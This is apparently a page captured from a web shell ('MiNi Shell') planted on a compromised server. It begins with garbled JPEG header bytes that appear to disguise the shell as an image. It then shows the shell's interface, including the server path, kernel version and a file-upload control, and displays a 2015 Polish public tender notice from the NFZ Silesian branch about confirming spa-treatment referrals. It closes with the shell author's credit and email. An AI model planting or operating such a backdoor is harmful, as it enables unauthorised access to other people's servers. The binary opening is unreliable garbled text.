JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20151203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20151203/178527-N-2015.html

<p class="kh_header"><b>Katowice: USŁUGA POTWIERDZANIA SKIEROWAŃ NA LECZENIE UZDROWISKOWE DOROSŁYCH I DZIECI</b><br>
<b>Numer ogłoszenia: 178527 - 2015; data zamieszczenia: 03.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Narodowy Fundusz Zdrowia, Śląski Oddział Wojewódzki , ul. Kossutha 13, 40-844 Katowice, woj. śląskie, tel. (032) 7351547, 7351637, faks 032 7351636.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.nfz-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA POTWIERDZANIA SKIEROWAŃ NA LECZENIE UZDROWISKOWE DOROSŁYCH I DZIECI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa potwierdzania skierowań na leczenie uzdrowiskowe dorosłych i dzieci, zgodnie z warunkami opisanymi w SIWZ.
Wykonywanie usługi będącej przedmiotem niniejszego zamówienia winno odbywać się zgodnie z obowiązującymi przepisami prawa, w tym zgodnie z rozporządzeniem Ministra Zdrowia z dnia 07.07.2011 w sprawie kierowania na leczenie uzdrowiskowe albo rehabilitację uzdrowiskową (Dz.U. Nr 142, poz. 835) oraz zgodnie z zasadami wiedzy medycznej.
Wykonawcy winny być znane zasady aprobaty skierowania pod względem celowości leczenia uzdrowiskowego oraz zakres obowiązków lekarza specjalisty w dziedzinie balneologii i medycyny fizykalnej lub rehabilitacji medycznej w związku z wykonywaniem usługi potwierdzania skierowań na leczenie uzdrowiskowe dorosłych i dzieci. Specjalizację z balneoklimatologii i medycyny fizykalnej uznaje się na potrzeby niniejszego postępowania za tożsamą ze specjalizacją z balneologii i medycyny fizykalnej.
Zakres obowiązków lekarza specjalisty, tj. lekarza balneologii i medycyny fizykalnej lub lekarza rehabilitacji medycznej:
1)potwierdzanie pod względem merytorycznym skierowań na leczenie uzdrowiskowe,
2)dokonywanie weryfikacji skierowań,
3)ocenianie pod względem medycznym odwołań ubezpieczonych dotyczących potwierdzenia lub niepotwierdzenia skierowania na leczenie uzdrowiskowe,
4)opiniowanie pod względem medycznym zwrotów skierowań na leczenie uzdrowiskowe,
5)opiniowanie pod względem medycznym skarg ubezpieczonych lub opiekunów dzieci.
---Zamówienie obejmuje liczbę maksymalnie 65.000 skierowań. 
Podaną ilość skierowań należy traktować jako maksymalną liczbę skierowań w okresie obowiązywania umowy. Ilość podaną dla tego okresu należy proporcjonalnie odnieść do 1 miesiąca, co określi ilość skierowań, których Wykonawca może spodziewać się w skali miesiąca. 
2. Termin wykonania zamówienia: w okresie do dnia 31.12.2016 r. (na zasadzie pojedynczych zleceń) począwszy od dnia zawarcia umowy, nie wcześniej jednak niż od dnia 01.01.2016 r. Termin wykonania pojedynczego zlecenia w ramach umowy nie może być dłuższy niż 7 dni licząc od dnia przekazania skierowań danemu lekarzowi specjaliście. Ilość skierowań przekazanych w ramach pojedynczego zlecenia danemu lekarzowi specjaliście nie przekroczy jednego tysiąca skierowań. Przekazanie skierowań, a także odbiór opracowanych skierowań od Wykonawcy odbywa się za pokwitowaniem..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.12.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobami zdolnymi do wykonania zamówienia.
a) Wykonawca w formularzu wykaz osób (pkt I - tabela) winien wskazać osoby, które będą uczestniczyć w wykonywaniu zamówienia, tj. w świadczeniu usługi potwierdzania skierowań na leczenie uzdrowiskowe dorosłych i dzieci, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
--W zakresie kwalifikacji zawodowych, wykształcenia - osoby te winny posiadać:
1)	prawo wykonywania zawodu lekarza;
2)	specjalizację w dziedzinie: balneologii i medycyny fizykalnej lub specjalizację w dziedzinie rehabilitacji medycznej.
Należy wykazać co najmniej 3 (trzech) lekarzy specjalistów posiadających jedną z ww. specjalizacji.
--Odnośnie doświadczenia lekarza specjalisty - należy podać liczbę lat pracy lekarza jako lekarza specjalisty w jednej z wymaganych dziedzin - każdy z lekarzy specjalistów wykazany w formularzu wykaz osób, winien posiadać doświadczenie rozumiane jako co najmniej 1 rok pracy jako lekarz specjalista, tj. lekarz z uprawnieniami - specjalizacją z dziedziny balneologii i medycyny fizykalnej lub z dziedziny rehabilitacji medycznej.
Przez 1 rok pracy należy rozumieć pełne 12 miesięcy pracy jako lekarz specjalista. 
Specjalizację z balneoklimatologii i medycyny fizykalnej uznaje się za tożsamą ze specjalizacją z balneologii i medycyny fizykalnej.
--Zakres wykonywanych czynności wykazanych osób (lekarzy specjalistów) określa pkt 6 formularza oferty.  
--Podstawę do dysponowania osobami (np. umowa o pracę, udostępnienie przez podmiot trzeci, umowa konsorcjum) należy wskazać w pkt I formularza wykaz osób (tabela, ostatnia kolumna).

b) Wykonawca winien złożyć oświadczenie (pkt II formularza wykaz osób), że osoby wymienione w formularzu wykaz osób, posiadają wymagane uprawnienia, tj. prawo wykonywania zawodu lekarza oraz specjalizację w dziedzinie balneologii i medycyny fizykalnej lub specjalizację w dziedzinie rehabilitacji medycznej.
Wymóg posiadania uprawnień wynika z obowiązujących w tym zakresie przepisów prawa, tj. rozporządzenie Ministra Zdrowia z dnia 07.07.2011 w sprawie kierowania na leczenie uzdrowiskowe albo rehabilitację uzdrowiskową (Dz.U. Nr 142, poz. 835) wydane na podstawie art. 33 ust.5 ustawy z dnia 27.08.2004 o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych (j.t. Dz.U.2015.581 ze zm.).

Oprócz oświadczenia o spełnianiu warunku udziału w postępowaniu, na potwierdzenie opisanego powyżej warunku Wykonawca przedłoży dokumenty, o których mowa w pkt VI lit. B ppkt 3 i ppkt 4 SIWZ.
---Zgodnie z art. 26 ust.2b pzp, Wykonawca może polegać między innymi na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów (tj. osób zdolnych do wykonania zamówienia) na potrzeby wykonania zamówienia, przy czym Wykonawca obowiązany jest uwzględnić zasady wykonywania zawodu lekarza w ramach praktyki wynikające z ustawy z dnia 05.12.1996 r. o zawodach lekarza i lekarza dentysty (j.t. Dz.U.2015.464) oraz ustawy z dnia 15.04.2011 r. o działalności leczniczej (j.t. Dz.U.2015.618 ze zm.).
W przypadku skorzystania z zasobów innego podmiotu/ów Wykonawca jest zobowiązany wskazać ten fakt w pkt 11 formularza oferty.
Jeżeli zasoby są udostępniane na zasadzie podwykonawstwa Wykonawca wypełnia także pkt 12A formularza oferty.
Zgodnie z art. 26 ust.2e pzp, podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b pzp, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
W przypadku skorzystania w niniejszym postępowaniu z zasobu (tj. osób zdolnych do wykonania zamówienia) innego podmiotu (art. 26 ust. 2b pzp), pisemne zobowiązanie innego podmiotu winno w szczególności wskazywać:
1) podmiot, który udostępni swoje zasoby (nazwa/firma oraz adres);
2) zakres dostępnych Wykonawcy zasobów innego podmiotu - wskazać udostępnione osoby zdolne do wykonania zamówienia; wskazać, w jakim zakresie zostaną udostępnione Wykonawcy;
3) sposób wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonywaniu zamówienia - wskazać, w jaki sposób Wykonawca będzie wykorzystywał zasoby innego podmiotu przy wykonywaniu zamówienia;
4) charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem;
5) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia. 
Zasoby winny zostać udostępnione na okres korzystania z nich przy wykonaniu zamówienia.
Patrz również pkt III ppkt 2 lit.e) SIWZ.
A zatem, w przypadku, gdy Wykonawca polega na osobach zdolnych do wykonania zamówienia innych podmiotów, zobowiązany jest:
a) załączyć pisemne zobowiązanie innego podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia;
b)w formularzu wykaz osób wskazać osoby udostępnione przez inny podmiot.
--Zamawiający żąda powyższego w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z innymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Średnia liczba lat pracy lekarzy specjalistów, którzy będą uczestniczyć w wykonywaniu zamówienia - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I.
1)Lekarzy specjalistów wraz ze wskazaniem ich uprawnień wymienia załącznik nr 1 do umowy. Wykonawca zobowiązany jest niezwłocznie informować Zamawiającego o każdym przypadku utraty uprawnień przez lekarza specjalistę wymienionego w załączniku nr 1 i zapewnić wprowadzenie na jego miejsce innego lekarza specjalisty posiadającego wymagane uprawnienia, przy spełnieniu wymogów określonych w §1 ust.9 umowy (poniżej w pkt 3).
2) Zamawiający zastrzega sobie prawo żądania wymiany lekarza specjalisty w przypadku niezadowolenia z jakości wykonywanej przez niego pracy lub w przypadku naruszenia przez niego innych warunków umowy, w szczególności obowiązku zachowania tajemnicy, o której mowa w §2 ust.2 umowy. Wykonawca zobowiązuje się uwzględniać żądania Zamawiającego dotyczące składu lekarzy specjalistów.
3) Ewentualna zmiana (wymiana) któregokolwiek z lekarzy specjalistów wskazanych w załączniku nr 1, przewidziana w umowie, będzie możliwa za zgodą Zamawiającego, w drodze pisemnego aneksu do umowy, przy uwzględnieniu wymogów ustawy Prawo zamówień publicznych oraz przy spełnieniu warunków stawianych lekarzom specjalistom w zamówieniu nr 26/pn/2015. Nowy lekarz specjalista wchodzący w miejsce poprzedniego musi spełniać warunki określone w niniejszej umowie. Doświadczenie nowego lekarza specjalisty (liczba lat pracy jako lekarz specjalista w jednej z dziedzin, o której mowa w §1 ust.3 umowy) musi pozostać bez wpływu na okoliczność uznania oferty Wykonawcy jako oferty najkorzystniejszej dla realizacji zamówienia nr 26/pn/2015. 
4)Zmiana (wymiana) lekarza specjalisty nie może prowadzić do zmiany podmiotowej po stronie Wykonawcy. Nie może zatem dotyczyć przypadku lekarza specjalisty będącego jednocześnie jednym z wykonawców (art. 23 ustawy Prawo zamówień publicznych), z którymi Zamawiający zawarł umowę. Zaistnienie takiej sytuacji uprawnia Zamawiającego do rozwiązania umowy bez zachowania terminu wypowiedzenia i naliczenia kary umownej w wysokości określonej w §6 ust.1 lit.e) umowy.
5)Zamawiający zastrzega sobie prawo rozwiązania umowy bez zachowania terminu wypowiedzenia i naliczenia kary umownej w wysokości określonej w § 6 ust. 1 lit.e) umowy również w przypadku rażącego naruszenia postanowień niniejszej umowy przez Wykonawcę (np. naruszenie postanowień §1 ust.9 umowy) lub nieprawidłowego albo niestarannego realizowania przedmiotu umowy.
6) Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunku udziału w postępowaniu,  o którym mowa w art. 22 ust.1 pkt 3 pzp, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. Wykonawca obowiązany jest uwzględnić zasady wykonywania zawodu lekarza w ramach praktyki wynikające z ustawy z dnia 05.12.1996 r. o zawodach lekarza i lekarza dentysty (j.t. Dz.U.2015.464) oraz ustawy z dnia 15.04.2011 r. o działalności leczniczej (j.t. Dz.U.2015.618 ze zm.).
II.
Zamawiający zastrzega sobie prawo do dokonania w trakcie realizacji umowy weryfikacji maksymalnej ilości skierowań podanej w umowie (65.000). Jeżeli przeprowadzona weryfikacja wskaże na mniejsze zapotrzebowanie w zakresie potwierdzanych ilości skierowań niż wynikające z umowy (np. z powodu faktycznego zmniejszenia się ilości skierowań wpływających do Zamawiającego bądź z powodu nawiązania przez Zamawiającego stosunku pracy w zakresie objętym przedmiotem umowy), Zamawiający zastrzega sobie prawo do zmniejszenia maksymalnej ilości skierowań.  Niniejsze nastąpi w drodze pisemnego aneksu do umowy wprowadzającego nową maksymalną ilość skierowań, ilość skierowań pozostałą jeszcze do opracowania w ramach umowy oraz odpowiednio zmniejszoną wysokość wynagrodzenia brutto umowy.
III.
dotyczy Wykonawców będących płatnikiem podatku VAT:
W przypadku ustawowej zmiany stawki podatku VAT w okresie realizacji umowy, do ceny jednostkowej netto podanej w ofercie Wykonawcy złożonej w zamówieniu nr 26/pn/2015, zostanie doliczona stawka podatku VAT obowiązująca na skutek wprowadzonej zmiany. 
Jeżeli zmiana stawki podatku VAT będzie oznaczała zwiększenie wynagrodzenia brutto umowy, Zamawiający zastrzega sobie prawo zmniejszenia ilości skierowań określonej w niniejszej umowie jako maksymalna, w przypadku nieposiadania stosownego zabezpieczenia w środkach finansowych. W takiej sytuacji realizacja umowy zakończy się z dniem, w którym suma płatności brutto wynikających z faktur VAT osiągnie lub zbliży się do wysokości kwoty brutto równej cenie oferty złożonej przez Wykonawcę w zamówieniu nr 26/pn/2015.  
Zmiana stawki podatku VAT wraz z konsekwencjami w postaci zmiany wynagrodzenia brutto umowy zostanie wprowadzona do umowy w formie pisemnej, w drodze aneksu do umowy, ze wskazaniem dnia wejścia w życie zmiany stawki podatku VAT, a także - w przypadku zwiększenia stawki podatku VAT - ze wskazaniem maksymalnej ilości skierowań możliwej do potwierdzenia w ramach zabezpieczonych środków finansowych oraz określonego na ich podstawie wynagrodzenia całkowitego brutto umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nfz-katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Śląski Oddział Wojewódzki Narodowego Funduszu Zdrowia ul. Kossutha 13, 40-844 Katowice, pokój 208A (II piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2015 godzina 11:00, miejsce: Śląski Oddział Wojewódzki Narodowego Funduszu Zdrowia ul. Kossutha 13, 40-844 Katowice, pokój 006 (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com